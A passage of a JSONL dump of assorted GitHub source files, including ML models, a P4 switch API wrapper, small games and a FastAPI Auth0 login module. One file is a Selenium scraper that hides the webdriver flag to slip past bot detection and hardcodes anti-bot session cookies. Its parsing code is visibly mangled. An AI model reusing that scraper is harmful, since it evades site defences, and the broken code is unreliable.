GridSearchCV(knn, param_grid, cv=5)\ngrid_search.fit(train_x.reshape(-1, 1), train_y)\n\nbest_k = grid_search.best_params_['n_neighbors']\n\n# train the model with the best k\nbest_knn = KNeighborsClassifier(n_neighbors=best_k)\nbest_knn.fit(train_x.reshape(-1, 1), train_y)\n\n# Make predictions on the test set\ntest_predictions = best_knn.predict(test_x.reshape(-1, 1))\n\n# Calculate the test accuracy\ntest_accuracy = accuracy_score(test_y, test_predictions)\n\n# Output the results\nprint(f\"Best k for kNN Classifier: {best_k}\")\nprint(f\"Test Accuracy: {test_accuracy:.2f}\")","repo_name":"shawlu95/ml2023-2-sofia","sub_path":"module9_knn_gridsearchcv.py","file_name":"module9_knn_gridsearchcv.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13252453655","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass GraphAttentionLayer(nn.Module):\n \"\"\"\n Simple GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(GraphAttentionLayer, self).__init__()\n self.dropout = dropout\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.empty(size=(in_features, out_features)))\n nn.init.xavier_uniform_(self.W.data, gain=1.414)\n self.a = nn.Parameter(torch.empty(size=(2*out_features, 1)))\n nn.init.xavier_uniform_(self.a.data, gain=1.414)\n\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n\n def forward(self, h, adj):\n Wh = torch.mm(h, self.W) # h.shape: (N, in_features), Wh.shape: (N, out_features)\n e = self._prepare_attentional_mechanism_input(Wh)\n\n zero_vec = -9e15*torch.ones_like(e)\n attention = torch.where(adj > 0, e, zero_vec)\n attention = F.softmax(attention, dim=1)\n attention = F.dropout(attention, self.dropout, training=self.training)\n h_prime = torch.matmul(attention, Wh)\n\n if self.concat:\n return F.elu(h_prime)\n else:\n return h_prime\n\n def _prepare_attentional_mechanism_input(self, Wh):\n # Wh.shape (N, out_feature)\n # self.a.shape (2 * out_feature, 1)\n # Wh1&2.shape (N, 1)\n # e.shape (N, N)\n Wh1 = torch.matmul(Wh, self.a[:self.out_features, :])\n Wh2 = torch.matmul(Wh, self.a[self.out_features:, :])\n # broadcast add\n e = Wh1 + Wh2.T\n return self.leakyrelu(e)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n\n\nclass SpecialSpmmFunction(torch.autograd.Function):\n \"\"\"Special function for only sparse region backpropataion layer.\"\"\"\n @staticmethod\n def forward(ctx, indices, values, shape, b):\n assert indices.requires_grad == False\n a = torch.sparse_coo_tensor(indices, values, shape)\n ctx.save_for_backward(a, b)\n ctx.N = shape[0]\n return torch.matmul(a, b)\n\n @staticmethod\n def backward(ctx, grad_output):\n a, b = ctx.saved_tensors\n grad_values = grad_b = None\n if ctx.needs_input_grad[1]:\n grad_a_dense = grad_output.matmul(b.t())\n edge_idx = a._indices()[0, :] * ctx.N + a._indices()[1, :]\n grad_values = grad_a_dense.view(-1)[edge_idx]\n if ctx.needs_input_grad[3]:\n grad_b = a.t().matmul(grad_output)\n return None, grad_values, None, grad_b\n\n\nclass SpecialSpmm(nn.Module):\n def forward(self, indices, values, shape, b):\n return SpecialSpmmFunction.apply(indices, values, shape, b)\n\n \nclass SpGraphAttentionLayer(nn.Module):\n \"\"\"\n Sparse version GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(SpGraphAttentionLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.zeros(size=(in_features, out_features)))\n nn.init.xavier_normal_(self.W.data, gain=1.414)\n \n self.a = nn.Parameter(torch.zeros(size=(1, 2*out_features)))\n nn.init.xavier_normal_(self.a.data, gain=1.414)\n\n self.dropout = nn.Dropout(dropout)\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n self.special_spmm = SpecialSpmm()\n\n def forward(self, input, adj):\n dv = 'cuda' if input.is_cuda else 'cpu'\n\n N = input.size()[0]\n edge = adj.nonzero().t()\n\n h = torch.mm(input, self.W)\n # h: N x out\n assert not torch.isnan(h).any()\n\n # Self-attention on the nodes - Shared attention mechanism\n edge_h = torch.cat((h[edge[0, :], :], h[edge[1, :], :]), dim=1).t()\n # edge: 2*D x E\n\n edge_e = torch.exp(-self.leakyrelu(self.a.mm(edge_h).squeeze()))\n assert not torch.isnan(edge_e).any()\n # edge_e: E\n\n e_rowsum = self.special_spmm(edge, edge_e, torch.Size([N, N]), torch.ones(size=(N,1), device=dv))\n # e_rowsum: N x 1\n\n edge_e = self.dropout(edge_e)\n # edge_e: E\n\n h_prime = self.special_spmm(edge, edge_e, torch.Size([N, N]), h)\n assert not torch.isnan(h_prime).any()\n # h_prime: N x out\n \n h_prime = h_prime.div(e_rowsum)\n # h_prime: N x out\n assert not torch.isnan(h_prime).any()\n\n if self.concat:\n # if this layer is not last layer,\n return F.elu(h_prime)\n else:\n # if this layer is last layer,\n return h_prime\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n","repo_name":"Diego999/pyGAT","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"75"} +{"seq_id":"31174726676","text":"# 82の出力を利用し,以下の出現分布,および定数を求めよ.\n# f(t,c): 単語tと文脈語cの共起回数\n# f(t,∗): 単語tの出現回数\n# f(∗,c): 文脈語cの出現回数\n# N: 単語と文脈語のペアの総出現回数\nimport collections\n\nipath = '../../data/input/'\nopath = '../../data/output/'\n\nfunc_t_c = []\nfunc_t_asta = []\nfunc_asta_c = []\ncount_f_t_c = collections.Counter()\ncount_f_t_a = collections.Counter()\ncount_f_a_c = collections.Counter()\n\nwith open(opath+'82.txt', encoding='utf-8') as f,\\\nopen(opath+'83_fn.txt', mode='w',encoding='utf-8') as fn:\n lines = f.readlines()\n for i,line in enumerate(lines,1):\n words = line.strip('\\n').split('\\t')\n\n func_t_c.append(line.strip('\\n'))\n func_t_asta.append(words[0])\n func_asta_c.append(words[1])\n if i % 1000000 == 0:\n count_f_t_c.update(func_t_c)\n count_f_t_a.update(func_t_asta)\n count_f_a_c.update(func_asta_c)\n func_t_c = []\n func_t_asta = []\n func_asta_c = []\n\n count_f_t_c.update(func_t_c)\n count_f_t_a.update(func_t_asta)\n count_f_a_c.update(func_asta_c)\n N = i\n print(N)\n fn.write(str(N))\n\nwith open(opath+'83_tc.txt',mode='a', encoding='utf-8') as ftc:\n for k,v in count_f_t_c.most_common():\n ftc.write('{}\\t{}\\n'.format(k,v))\n\nwith open(opath+'83_ta.txt', mode='a',encoding='utf-8') as fta:\n for k,v in count_f_t_a.most_common():\n fta.write('{}\\t{}\\n'.format(k,v))\n\nwith open(opath+'83_ac.txt', mode='a',encoding='utf-8') as fac:\n for k,v in count_f_a_c.most_common():\n fac.write('{}\\t{}\\n'.format(k,v))\n","repo_name":"ryu022304/NLP_100knocks","sub_path":"src/chap.09/83.py","file_name":"83.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38156793911","text":"# 비만도 계산기 - 완성\n\nclass Bmi(object):\n def __init__(self, name, cm, kg):\n self.name = name\n self.cm = cm\n self.kg = kg\n self.biman = \"\"\n\n def execute(self):\n self.biman = self.get_biman()\n self.get_biman()\n self.print_biman()\n\n def get_bmi(self):\n m = self.cm / 100\n kg = self.kg\n return kg / m ** 2 # ** 제곱\n\n def get_biman(self):\n cal = self.get_bmi()\n if cal >= 35:\n biman = \"고도 비만\"\n elif cal >= 30:\n biman = \"중(重)도 비만 (2단계 비만)\"\n elif cal >= 25:\n biman = \"경도 비만 (1단계 비만)\"\n elif cal >= 23:\n biman = \"과체중\"\n elif cal >= 18.5:\n biman = \"정상\"\n else:\n biman = \"저체중\"\n self.biman = biman\n\n def print_biman(self):\n name = self.name\n biman = self.biman\n cm = self.cm\n kg = self.kg\n title = \" ### 비만도 계산기 ### \"\n aster = \"*\"*40\n schema = \"이름 키(cm) 몸무게(kg) 비만도\"\n result = f'{name} {cm} {kg} {biman}'\n print(f'{title}\\n{aster}\\n{schema}\\n{aster}\\n{result}\\n{aster}')\n\n @staticmethod\n def main():\n name = input(\"이름 : \")\n cm = int(input(\"키(cm) : \"))\n kg = int(input(\"몸무게(kg) : \"))\n bmi = Bmi(name, cm, kg)\n bmi.execute()\n\nBmi.main()","repo_name":"phayeon/Python-program","sub_path":"encapsulation/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2968847424","text":"import sys\nimport time\nimport logging\nimport os\n\nif os.name == 'nt':\n from neutron.agent.windows import utils as exc_utils\nelse:\n from neutron.agent.linux import utils as exc_utils\n\nfrom runtime_CLI import ResType\n\nimport networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api\nfrom bm_runtime.standard.Standard import *\nfrom networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api import parse_match_key\n\nLOG = logging.getLogger(__name__)\n\nACTION_TYPE_DEFAULT = 'default'\nACTION_TYPE_RUNTIME = 'runtime'\n\nBMv2_PORT = 9090\n\n\nclass Bmv2Api(object):\n\n def _get_bmv2_api(self):\n return networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2.runtime_api.get_api(BMv2_PORT)\n\n def _get_bmv2_client(self):\n return self._get_bmv2_api().client\n\n def add_port(self, iface_name):\n port_num = self._get_port_num_from_pool()\n self._get_bmv2_client().bm_dev_mgr_add_port(iface_name, port_num, \"\")\n\n def _get_port_num_from_pool(self):\n ports_int = []\n for port_info in self._get_bmv2_client().bm_dev_mgr_show_ports():\n ports_int.append(int(port_info.port_num))\n ports_int.sort()\n size = len(ports_int)\n last_port_num = size + 1\n return last_port_num\n\n def get_number_of_ports(self):\n return len(self._get_bmv2_client().bm_dev_mgr_show_ports())\n\n def _clean_ports(self):\n ports = self._get_bmv2_client().bm_dev_mgr_show_ports()\n for port_info in ports:\n self._get_bmv2_client().bm_dev_mgr_remove_port(port_info.port_num)\n\n def remove_port(self, iface_name):\n port_num = self._get_port_num_by_name(iface_name)\n self._get_bmv2_client().bm_dev_mgr_remove_port(port_num)\n\n def _get_port_num_by_name(self, iface_name):\n port_num = None\n ports = self._get_bmv2_client().bm_dev_mgr_show_ports()\n for port_info in ports:\n if port_info.iface_name == iface_name:\n port_num = port_info.port_num\n break\n return port_num\n\n def run(self, intf):\n cmd = ['sudo', 'simple_switch', '-i', intf, '--thrift-port',\n '10811', '--no-p4',\n '--', '--enable-swap']\n exc_utils.execute(cmd, run_as_root=True, log_fail_as_error=True)\n\n def create_instance(self, intf):\n intf_def = \"1@\" + intf\n\n self.run(intf_def)\n\n time.sleep(3)\n\n LOG.info(\"BMv2 instance created. \" + str(self.get_config()))\n\n def delete_instance(self):\n pass\n\n def get_config(self):\n return self._get_bmv2_client().bm_get_config()\n\n def upload_config(self, json_conf):\n try:\n self._get_bmv2_client().bm_load_new_config(json_conf)\n except InvalidSwapOperation as e:\n if e.code == SwapOperationErrorCode.ONGOING_SWAP:\n LOG.warning(\"P4Agent tries to load new config during swap ongoing. \"\n \"Swapping configs and retrying..\")\n self._get_bmv2_client().bm_swap_configs()\n self.upload_config(json_conf)\n try:\n self._get_bmv2_client().bm_swap_configs()\n except InvalidSwapOperation as e:\n if e.code == SwapOperationErrorCode.NO_ONGOING_SWAP:\n pass\n else:\n raise e\n\n def table_set_default_entry(self, table_name, action_name, action_entry):\n self._get_bmv2_client().bm_mt_set_default_action(0, table_name, action_name, action_entry)\n\n def table_set_runtime_entry(self, table_name, match_keys, action_name, action_entry, priority):\n # get object representing P4 Table\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n # get object representing P4 Action\n action = table.get_action(action_name)\n\n # parse arrays to Thrift-friendly objects\n match_obj = parse_match_key(table, match_keys)\n action_obj = self._get_bmv2_api().parse_runtime_data(action, action_entry)\n\n LOG.info(\"Adding table entry.. %s %s %s\" % (table.name, str(match_obj), str(action_obj)))\n\n entry = None\n\n # check if entry with match key exists\n try:\n entry = self._get_bmv2_client().bm_mt_get_entry_from_key(\n 0, table.name, match_obj, BmAddEntryOptions(priority=priority))\n except InvalidTableOperation as e:\n if e.code == TableOperationErrorCode.BAD_MATCH_KEY:\n # it means there is no entry for match key\n pass\n\n if entry:\n # modify existing entry\n self._get_bmv2_client().bm_mt_modify_entry(\n 0, table.name, entry.entry_handle, action.name, action_obj\n )\n LOG.debug(\"Entry {} has been modified with action {} {}\".format(str(match_keys), action_name,\n str(action_entry)))\n else:\n # adding new entry\n self._get_bmv2_client().bm_mt_add_entry(\n 0, table_name, match_obj, action.name, action_obj,\n BmAddEntryOptions(priority=priority)\n )\n LOG.debug(\"Entry {} has been added with action {} {}\".format(str(match_keys), action_name,\n str(action_entry)))\n\n def add_table_entry(self, **kwargs):\n action_type = kwargs['action_type']\n table_name = kwargs['table_id']\n action_name = kwargs['action_name']\n action_entry = kwargs['action_params']\n if action_type == ACTION_TYPE_DEFAULT:\n self.table_set_default_entry(table_name, action_name, action_entry)\n elif action_type == ACTION_TYPE_RUNTIME:\n match_keys = kwargs['match_keys']\n priority = kwargs['priority'] if kwargs['priority'] else 0\n self.table_set_runtime_entry(table_name, match_keys, action_name, action_entry, priority)\n\n def delete_table_entry(self, **kwargs):\n action_type = kwargs['action_type']\n table_name = kwargs['table_id']\n action_name = kwargs['action_name']\n action_entry = kwargs['action_params']\n match_keys = kwargs['match_keys']\n priority = kwargs['priority'] if kwargs['priority'] else 0\n\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n match_obj = parse_match_key(table, match_keys)\n\n entry = self._get_bmv2_client().bm_mt_get_entry_from_key(\n 0, table.name, match_obj, BmAddEntryOptions(priority=priority))\n\n self._get_bmv2_client().bm_mt_delete_entry(0, table.name, entry.entry_handle)\n\n def get_entries_from_table(self, table_name):\n table = self._get_bmv2_api().get_res(\"table\", table_name, ResType.table)\n return self._get_bmv2_client().bm_mt_get_entries(0, table.name)\n\n def get_all_table_entries(self):\n pass\n","repo_name":"osinstom/networking-dppx","sub_path":"networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/bmv2_api.py","file_name":"bmv2_api.py","file_ext":"py","file_size_in_byte":6901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26345081840","text":"\"\"\"THird migration\n\nRevision ID: 4de6eb28ace7\nRevises: 4b4e0f0c687b\nCreate Date: 2019-04-21 14:43:29.316188\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4de6eb28ace7'\ndown_revision = '4b4e0f0c687b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('pithes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pitch', sa.String(length=500), nullable=True),\n sa.Column('role_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['role_id'], ['roles.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_constraint('users_role_id_fkey', 'users', type_='foreignkey')\n op.drop_column('users', 'role_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('role_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.create_foreign_key('users_role_id_fkey', 'users', 'roles', ['role_id'], ['id'])\n op.drop_table('pithes')\n # ### end Alembic commands ###\n","repo_name":"kipkemoimayor/Pitch","sub_path":"migrations/versions/4de6eb28ace7_third_migration.py","file_name":"4de6eb28ace7_third_migration.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7741773523","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2021/8/13 9:19\n# @Author : ChenLvLei\n# @Email : 2516455367@qq.com\n# @FileName : hubeisheng\n# @Description :http://sthjt.hubei.gov.cn/site/sthjt/search.html?searchWord=%E7%A2%B3%E6%8E%92%E6%94%BE&siteId=41&pageSize=10\n# code is far away from bugs with the god animal protecting\n I love animals. They taste delicious.\n ┏┓ ┏┓\n ┏┛┻━━━┛┻┓\n ┃ ☃ ┃\n ┃ ┳┛ ┗┳ ┃\n ┃ ┻ ┃\n ┗━┓ ┏━┛\n ┃ ┗━━━┓\n ┃ 神兽保佑 ┣┓\n ┃ 永无BUG! ┏┛\n ┗┓┓┏━┳┓┏┛\n ┃┫┫ ┃┫┫\n ┗┻┛ ┗┻┛\n\"\"\"\nimport re\nimport sys\nimport time\nfrom selenium.webdriver import ChromeOptions\n\n\n\n\n\nimport requests\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n}\ncookies = {\n 'FSSBBIl1UgzbN7NS': '52LhjfsRCbsKkS60MmirBXJ3VwhH57l2l2_lKZe997bY3lCFI7JD8esapOhk9Bbkgwd6wS0.Ra6Jc6NqFiSJ8Ba',\n 'SECKEY_CID2': '04b694981378f15713c68048699130ca543bfe17',\n 'BMAP_SECKEY2': 'c6d9c7e05d7e627c56ed46fab5d7c5c792064779599d5e12b955a6f18a1204375d1588206c94d22e4bdd1ade0ad06e78c21917e24c6223b96bc51b75ca38651a6fc59510ca068f1214d6bf0c8b54732b4fb988b974e1f28e45a8804d088d994188c248f323240a0e5ed7d9fc646294ab24144bc3df98c0390b316da11851a5051b6dbf5b892d2fc10114795dc6da4dc719fe9e3e2f451517db774263c9083301f4c2689ab9ec02810ae19a2a76b3e45b0c6dc9b4ed4575f8871066fc82ca20f77a138daa61c2dacfbc2e26d51dac29bb67bc1f07fa6ac9b5b8adf6daa8e65f427e93db69cfb38b2d4053b8419bd91c30',\n 'FSSBBIl1UgzbN7NT': '533z0XDDhwhGqqqmechdTBaam_M_Y65VDq.Pkm77UpzOVxZuvnGmK3j1FyZhrVn21dlKqzBxFh5prvc172OQHKAfHsjd5lAkTGKyBdwaL9d1b1F.lkuKZpbSt6E39y6L8cdeaRv8PH8Re75qohThX7DvzQK0Fj6UifccQ2t7tbgjU0DXTqH6KJQbg.IDx5iB5kL3bH53m0M_oBGhdUgfTamWg.khKvlrIPKBoK6.8TMdoHWA4mKV14nk7s9fe7_1QARzIz2xME_S3ts4OV6mWQeIh5PCVXQGJDFLBmsjIG7uj8PB3wIvEjcJT_nTEINMfL',\n}\nchrome_options = ChromeOptions()\n# chrome_options.add_argument(\"--incognito\") # 配置隐私模式\n# chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\nchrome_options.add_argument('--no-sandbox') # 解决DevToolsActivePort文件不存在的报错\nchrome_options.add_argument('window-size=1920x3000') # 指定浏览器分辨率\nchrome_options.add_argument('--disable-gpu') # 谷歌文档提到需要加上这个属性来规避bug\nchrome_options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\nchrome_options.add_argument('blink-settings=imagesEnabled=false') # 不加载图片, 提升速度\nchrome_options.add_argument('--headless')\ndriver = webdriver.Chrome(\"/usr/bin/chromedriver\", chrome_options=chrome_options)\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n Object.defineProperty(navigator,'webdriver',{\n get: () => undefined\n })\n \"\"\"\n})\ntime.sleep(20)\ndriver.get('http://www.sgcc.com.cn/html/sgcc_main/index.shtml')\ntime.sleep(5)\ncontent = driver.page_source\nprint(content)\ncookie = driver.get_cookies()\ndict(cookies)\ncookies['FSSBBIl1UgzbN7NS'] = cookie[2].get('value')\ncookies['SECKEY_CID2'] = cookie[3].get('value')\ncookies['BMAP_SECKEY2'] = cookie[0].get('value')\ncookies['FSSBBIl1UgzbN7NT'] = cookie[1].get('value')\n\nurl = re.compile('(.*?)').findall(str(articleContent))\n if title == []:\n continue\n print(title[0])\n except Exception as err:\n print()\n\n\n\n","repo_name":"houwudi14010/github_huanghyw_jd_seckill-master","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"73340829682","text":"import random\r\nfrom replit import clear\r\n\r\nstages = ['''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n / \\ |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n / |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /|\\ |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n /| |\r\n |\r\n |\r\n=========''', '''\r\n +---+\r\n | |\r\n O |\r\n | |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n O |\r\n |\r\n |\r\n |\r\n=========\r\n''', '''\r\n +---+\r\n | |\r\n |\r\n |\r\n |\r\n |\r\n=========\r\n''']\r\n\r\nword_list = [\"arvore\",\"amor\",\"gato\",\"cacho\",\"rio\",\"perola\",\"flor\",\"lua\",\"ceu\",\"melao\",\"mesa\",\"chave\",\"banho\",\"livro\",\"cesta\",\"marca\",\"peixe\",\"sorte\",\"praia\",\"bolsa\",\"antes\",\"rocha\",\"camel\",\"amigo\",\"pipa\",\"canto\",\"vaso\",\"papai\",\"queijo\",\"rodas\",\"trevo\",\"sobre\",\"lente\",\"velho\",\"corte\",\"prato\",\"cinza\",\"terra\",\"mundo\",\"lirio\",\"leao\",\"cavalo\",\"roda\",\"barco\",\"pele\",\"sapato\",\"chuva\",\"lago\",\"alien\",\"caneta\",\"pastel\",\"danca\",\"teatro\",\"pesca\",\"piscar\",\"brinco\",\"fraco\",\"anjos\",\"sucos\",\"biscoito\",\"canto\",\"fazer\",\"falar\",\"comer\",\"chove\",\"passeio\",\"forno\",\"pular\",\"bebes\",\"azeite\",\"fruta\",\"fofoca\",\"areia\",\"feira\",\"salmao\",\"bruxa\",\"brasa\",\"fogos\",\"cegar\",\"habito\",\"focos\",\"honra\",\"joias\",\"mural\",\"palha\",\"irmao\",\"limpo\",\"pneus\",\"queda\",\"toalha\",\"vagas\",\"sorte\",\"secar\",\"pegar\",\"velho\",\"queda\",\"visita\",\"rapou\",\"acatar\",\"bigorna\",\"cinico\"]\r\nchosen_word = random.choice(word_list)\r\n\r\nvidas = 6\r\n\r\n#Testing code\r\n#print(f'Pssst, the solution is {chosen_word}.')\r\n\r\ndisplay = []\r\nn = len(chosen_word)\r\nfor _ in range(len(chosen_word)):\r\n display.append(\"_\")\r\n\r\nprint(f\"A palavra que você precisa descobrir tem {n} letras\\n\")\r\nprint(f\"{display}\")\r\nprint(stages[vidas])\r\n\r\nfim_de_jogo = False\r\ntentativas = []\r\n\r\nwhile not fim_de_jogo:\r\n guess = input(\"Escolha a letra: \").lower()\r\n clear()\r\n \r\n if len(guess) == 1:\r\n if guess not in tentativas:\r\n for position in range(len(chosen_word)):\r\n letter = chosen_word[position]\r\n \r\n if letter == guess:\r\n display[position] = letter\r\n \r\n if guess in chosen_word:\r\n print(f\"Você acertou, {guess} é uma das letras.\\n\") \r\n \r\n if guess not in chosen_word:\r\n vidas -= 1\r\n print(f\"Você errou, {guess} não é uma das letras.\\n\")\r\n\r\n tentativas.append(guess)\r\n print(f\"tentativas:{sorted(tentativas)}\")\r\n print(stages[vidas])\r\n print(f\"{display}\\n\")\r\n \r\n if vidas == 0: \r\n print(f\"GAME OVER... Você perdeu!\\nA palavra era {chosen_word}\")\r\n break \r\n \r\n if \"_\" not in display:\r\n fim_de_jogo = True\r\n print(\"Você venceu!\") \r\n \r\n else:\r\n print(f\"Você já escolheu a letra {guess} anteriormente. Tente novamente.\")\r\n print(f\"tentativas:{sorted(tentativas)}\")\r\n print(stages[vidas])\r\n print(f\"{display}\\n\")\r\n \r\n else:\r\n print(\"Escreva apenas uma letra...\")\r\n","repo_name":"marcelozc/Python","sub_path":"aula7_jogo_da_forca.py","file_name":"aula7_jogo_da_forca.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40031882468","text":"from typing import List\n\n\nclass Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n if len(nums) == 0:\n return 0\n rear = len(nums)\n for i in range(len(nums)):\n while rear >= 1 and nums[rear - 1] == val:\n rear -= 1\n if nums[i] == val and i < rear:\n nums[i], nums[rear - 1] = nums[rear - 1], nums[i]\n rear -= 1\n i -= 1\n return rear\n\n\ndef main():\n nums = [0,4,4,0,4,4,4,0,2]\n val = 4\n res = Solution().removeElement(nums, val)\n print(res)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Jintaimeng/Leetcode","sub_path":"一、数组/27、移除元素.py","file_name":"27、移除元素.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34864266038","text":"from os import environ as env\nfrom urllib.parse import quote_plus, urlencode\n\nfrom authlib.integrations.starlette_client import OAuth\nfrom fastapi import APIRouter, Request, Depends\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.security import APIKeyHeader\nfrom fastapi.exceptions import HTTPException\nfrom starlette.config import Config\nimport app.crud as crud\nimport app.common as common\nimport app.exceptions as exceptions\n\nconfig = Config(\".env\")\noauth = OAuth(config)\nauth0 = oauth.register(\n \"auth0\",\n client_id=env.get(\"AUTH0_CLIENT_ID\"),\n client_secret=env.get(\"AUTH0_CLIENT_SECRET\"),\n client_kwargs={\n \"scope\": \"openid profile email\",\n },\n server_metadata_url=f'https://{env.get(\"AUTH0_DOMAIN\")}/.well-known/openid-configuration',\n)\nassert auth0\n\napi_key_header = APIKeyHeader(name=\"Authorization\")\n\n\ndef dep_api_key(api_key_header: str = Depends(api_key_header)):\n if api_key_header != env.get(\"API_KEY\"):\n raise HTTPException(status_code=403, detail=\"Unauthorized\")\n return api_key_header\n\n\nrouter = APIRouter(prefix=\"\", tags=[\"authentication\"])\n\n\n@router.get(\"/login\")\nasync def login(request: Request):\n print(request)\n redirect_uri = str(request.url_for(\"callback\"))\n print(f\"login redirect_uri: {redirect_uri}\")\n return await auth0.authorize_redirect(request, redirect_uri)\n\n\n@router.get(\"/callback\")\nasync def callback(request: Request, db=Depends(crud.dep_db)):\n jwt = await auth0.authorize_access_token(request)\n request.session[\"user\"] = jwt\n if crud.get_user(db, common.get_sub_from_jwt(jwt)) is None:\n crud.create_user(\n db, user_id=common.get_sub_from_jwt(jwt), email=jwt[\"userinfo\"][\"email\"]\n )\n return RedirectResponse(request.url_for(\"index\"))\n\n\n@router.get(\"/logout\")\nasync def logout(request: Request):\n request.session.clear()\n index_url = str(request.url_for(\"index\"))\n logout_url = (\n \"https://\"\n + env.get(\"AUTH0_DOMAIN\", \"\")\n + \"/v2/logout?\"\n + urlencode(\n {\n \"returnTo\": index_url,\n \"client_id\": env.get(\"AUTH0_CLIENT_ID\"),\n },\n quote_via=quote_plus,\n )\n )\n return RedirectResponse(url=logout_url)\n","repo_name":"thornewolf/fastapi-tailwind-database-openai","sub_path":"app/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2095245562","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datasketch import MinHash, MinHashLSH\n\n\nclass LSHClusteringLib(object):\n \"\"\"\n Suppose you have a very large collection of sets. Giving a query, which is\n also a set, you want to find sets in your collection that have Jaccard\n similarities above certain threshold, and you want to do it with many other\n queries. To do this efficiently, you can create a MinHash for every set,\n and when a query comes, you compute the Jaccard similarities between the\n query MinHash and all the MinHash of your collection, and return the sets\n that satisfy your threshold.\n\n *** Read more via : https://ekzhu.github.io/datasketch/lsh.html\n\n \"\"\"\n\n def __init__(self, threshold=0.9, num_perm=128):\n \"\"\"\n Init\n Args:\n threshold (float): The Jaccard similarity threshold between 0.0 and\n 1.0. The initialized MinHash LSH will be optimized for the threshold\n by minizing the false positive and false negative.\n num_perm (int): The number of permutation functions used\n by the MinHash to be indexed\n \"\"\"\n self.threshold = threshold\n self.num_perm = num_perm\n self.lsh_server = MinHashLSH(threshold=threshold, num_perm=num_perm)\n\n def get_lsh_server(self):\n return self.lsh_server\n\n def compute_min_hash_lsh(self, terms):\n \"\"\"\n Compute min hash LSH of a set of tokens\n\n Args:\n terms (set): set of unique terms\n\n Returns:\n (MinHash): min hash LSH value\n\n \"\"\"\n m = MinHash(num_perm=self.num_perm)\n for e in terms:\n m.update(e.encode('utf8'))\n return 